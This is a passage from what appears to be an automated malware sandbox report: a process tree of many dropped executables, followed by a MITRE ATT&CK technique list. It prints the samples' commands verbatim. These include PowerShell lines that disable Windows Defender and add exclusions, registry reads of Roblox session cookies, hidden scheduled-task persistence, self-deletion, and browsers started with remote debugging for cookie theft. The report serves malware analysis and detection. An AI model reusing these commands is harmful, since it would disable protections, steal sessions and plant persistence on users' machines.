  - Maps connected drives based on registry
  - Checks SCSI registry key(s)
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:440
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 440 -s 2052
    3⤵
    PID:856
- C:\Users\Admin\AppData\Local\Temp\a\saloader.exe
  "C:\Users\Admin\AppData\Local\Temp\a\saloader.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  PID:1748
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\a\saloader.exe"
    3⤵
    - Views/modifies file attributes
    PID:4824
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\saloader.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4168
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2740
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1512
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3360
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    PID:2604
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:2204
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:3612
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3948
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:5176
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\a\saloader.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:6060
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:6112
- C:\Users\Admin\AppData\Local\Temp\a\aidans.dont.run.exe
  "C:\Users\Admin\AppData\Local\Temp\a\aidans.dont.run.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:4416
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "windows" /tr '"C:\Users\Admin\AppData\Roaming\windows.exe"' & exit
    3⤵
    PID:2116
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "windows" /tr '"C:\Users\Admin\AppData\Roaming\windows.exe"'
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpC484.tmp.bat""
    3⤵
    PID:3764
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:316
  - - C:\Users\Admin\AppData\Roaming\windows.exe
      "C:\Users\Admin\AppData\Roaming\windows.exe"
      4⤵
      Executes dropped EXE
      PID:6008
- C:\Users\Admin\AppData\Local\Temp\a\handeltest.exe
  "C:\Users\Admin\AppData\Local\Temp\a\handeltest.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1948
- C:\Users\Admin\AppData\Local\Temp\a\xs.exe
  "C:\Users\Admin\AppData\Local\Temp\a\xs.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:3840
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "aspnet_regbrowsers" /tr '"C:\Users\Admin\AppData\Roaming\aspnet_regbrowsers.exe"' & exit
    3⤵
    PID:5368
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "aspnet_regbrowsers" /tr '"C:\Users\Admin\AppData\Roaming\aspnet_regbrowsers.exe"'
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpC81D.tmp.bat""
    3⤵
    PID:5396
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:5460
  - - C:\Users\Admin\AppData\Roaming\aspnet_regbrowsers.exe
      "C:\Users\Admin\AppData\Roaming\aspnet_regbrowsers.exe"
      4⤵
      Executes dropped EXE
      PID:5172
- C:\Users\Admin\AppData\Local\Temp\a\Tutorial.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Tutorial.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:4168
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5656
- C:\Users\Admin\AppData\Local\Temp\a\aa.exe
  "C:\Users\Admin\AppData\Local\Temp\a\aa.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:5276
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "atat" /tr '"C:\Users\Admin\AppData\Roaming\atat.exe"' & exit
    3⤵
    PID:5800
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "atat" /tr '"C:\Users\Admin\AppData\Roaming\atat.exe"'
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpCDAB.tmp.bat""
    3⤵
    PID:5816
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:5908
  - - C:\Users\Admin\AppData\Roaming\atat.exe
      "C:\Users\Admin\AppData\Roaming\atat.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:5224
- C:\Users\Admin\AppData\Local\Temp\a\nobody.exe
  "C:\Users\Admin\AppData\Local\Temp\a\nobody.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5536
- C:\Users\Admin\AppData\Local\Temp\a\ataturk.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ataturk.exe"
  2⤵
  - Executes dropped EXE
  PID:5728
- C:\Users\Admin\AppData\Local\Temp\a\start.exe
  "C:\Users\Admin\AppData\Local\Temp\a\start.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5960
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "System32" /tr '"C:\Users\Admin\AppData\Roaming\System32.exe"' & exit
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5408
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "System32" /tr '"C:\Users\Admin\AppData\Roaming\System32.exe"'
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:5304
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDD3C.tmp.bat""
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5360
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4824
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 3
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:5568
  - - C:\Users\Admin\AppData\Roaming\System32.exe
      "C:\Users\Admin\AppData\Roaming\System32.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5772
- C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  PID:3700
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Enumerates system info in registry
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    PID:4828
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffda49ecc40,0x7ffda49ecc4c,0x7ffda49ecc58
      4⤵
      PID:2964
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1928,i,657300664029149572,17399631106911857420,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1924 /prefetch:2
      4⤵
      PID:2228
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2164,i,657300664029149572,17399631106911857420,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2128 /prefetch:3
      4⤵
      PID:5608
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2220,i,657300664029149572,17399631106911857420,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2452 /prefetch:8
      4⤵
      PID:2860
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3092,i,657300664029149572,17399631106911857420,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3112 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4524
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3120,i,657300664029149572,17399631106911857420,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3152 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:1436
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4440,i,657300664029149572,17399631106911857420,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4416 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4500
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4664,i,657300664029149572,17399631106911857420,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4472 /prefetch:8
      4⤵
      PID:2904
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    PID:2924
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd899f46f8,0x7ffd899f4708,0x7ffd899f4718
      4⤵
      PID:64
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,9735531552930437689,4211762234559714515,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
      4⤵
      PID:2964
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,9735531552930437689,4211762234559714515,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
      4⤵
      PID:1096
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,9735531552930437689,4211762234559714515,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3004 /prefetch:8
      4⤵
      PID:2344
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2128,9735531552930437689,4211762234559714515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:1020
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2128,9735531552930437689,4211762234559714515,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:3764
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2128,9735531552930437689,4211762234559714515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4748 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:6204
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2128,9735531552930437689,4211762234559714515,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4900 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:6212
- C:\Users\Admin\AppData\Local\Temp\a\xblkpfZ8Y4.exe
  "C:\Users\Admin\AppData\Local\Temp\a\xblkpfZ8Y4.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  PID:3416
- C:\Users\Admin\AppData\Local\Temp\a\test28.exe
  "C:\Users\Admin\AppData\Local\Temp\a\test28.exe"
  2⤵
  - Executes dropped EXE
  PID:736
- C:\Users\Admin\AppData\Local\Temp\a\test26.exe
  "C:\Users\Admin\AppData\Local\Temp\a\test26.exe"
  2⤵
  - Executes dropped EXE
  PID:2188
- C:\Users\Admin\AppData\Local\Temp\a\test27.exe
  "C:\Users\Admin\AppData\Local\Temp\a\test27.exe"
  2⤵
  - Executes dropped EXE
  PID:5984
- C:\Users\Admin\AppData\Local\Temp\a\test29.exe
  "C:\Users\Admin\AppData\Local\Temp\a\test29.exe"
  2⤵
  - Executes dropped EXE
  PID:5424
- C:\Users\Admin\AppData\Local\Temp\a\test25.exe
  "C:\Users\Admin\AppData\Local\Temp\a\test25.exe"
  2⤵
  PID:3020
- C:\Users\Admin\AppData\Local\Temp\a\test24.exe
  "C:\Users\Admin\AppData\Local\Temp\a\test24.exe"
  2⤵
  PID:5276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4224 -ip 4224
1⤵
PID:752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4224 -ip 4224
1⤵
PID:2752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4224 -ip 4224
1⤵
PID:2800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4224 -ip 4224
1⤵
PID:1028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4224 -ip 4224
1⤵
PID:1012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4224 -ip 4224
1⤵
PID:4420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4224 -ip 4224
1⤵
PID:2964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4224 -ip 4224
1⤵
PID:3408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4224 -ip 4224
1⤵
PID:440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 4224 -ip 4224
1⤵
PID:2440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 1092 -ip 1092
1⤵
PID:3912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 1092 -ip 1092
1⤵
PID:5108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 1092 -ip 1092
1⤵
PID:1124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 1092 -ip 1092
1⤵
PID:4872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 1092 -ip 1092
1⤵
PID:3320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 1092 -ip 1092
1⤵
PID:2360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 1092 -ip 1092
1⤵
PID:3344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1092 -ip 1092
1⤵
PID:3120

C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
1⤵
- Executes dropped EXE
PID:4464
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 440
  2⤵
  - Program crash
  PID:540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 4464 -ip 4464
1⤵
PID:4168

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Drops startup file
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1900
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 04C024E17A899CEB50CE7940CA26BF9E C
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:3288
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:4184
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 44B36E32A0DE0758130B449DE97868F4
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2116
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss825E.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi825A.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr825B.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr825C.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1592
- C:\Users\Admin\AppData\Local\Corporation\SystemCare1.0.exe
  "C:\Users\Admin\AppData\Local\Corporation\SystemCare1.0.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:396
- C:\Windows\Installer\MSI98D8.tmp
  "C:\Windows\Installer\MSI98D8.tmp" /DontWait /RunAsAdmin /HideWindow "C:\Users\Admin\AppData\Roaming\Installer\Setup\task.bat"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Access Token Manipulation: Create Process with Token
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5072
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C ""C:\Users\Admin\AppData\Roaming\Installer\Setup\task.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4520
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks.exe /create /tn "SystemCare" /tr "C:\Users\Admin\AppData\Local\Corporation\SystemCare1.0.exe" /sc onstart /delay 0005:00
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:4488
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -Command "Start-Process powershell -ArgumentList '-WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command \"Add-MpPreference -ExclusionPath C:\Users\$env:username\AppData\Local; Set-MpPreference -MAPSReporting Disabled; Set-MpPreference -SubmitSamplesConsent NeverSend\"' -NoNewWindow"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:4260
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath C:\Users\$env:username\AppData\Local; Set-MpPreference -MAPSReporting Disabled; Set-MpPreference -SubmitSamplesConsent NeverSend"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2452

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
PID:3328

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:5072

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:672

C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
1⤵
- Executes dropped EXE
PID:5820
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5820 -s 452
  2⤵
  - Program crash
  PID:5272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 5820 -ip 5820
1⤵
PID:5264

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:5304

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:5816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 1092 -ip 1092
1⤵
PID:704

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

BITS Jobs

T1197

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Modify Authentication Process

T1556

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Access Token Manipulation

T1134

Create Process with Token

T1134.002

BITS Jobs

T1197

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Authentication Process

T1556

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

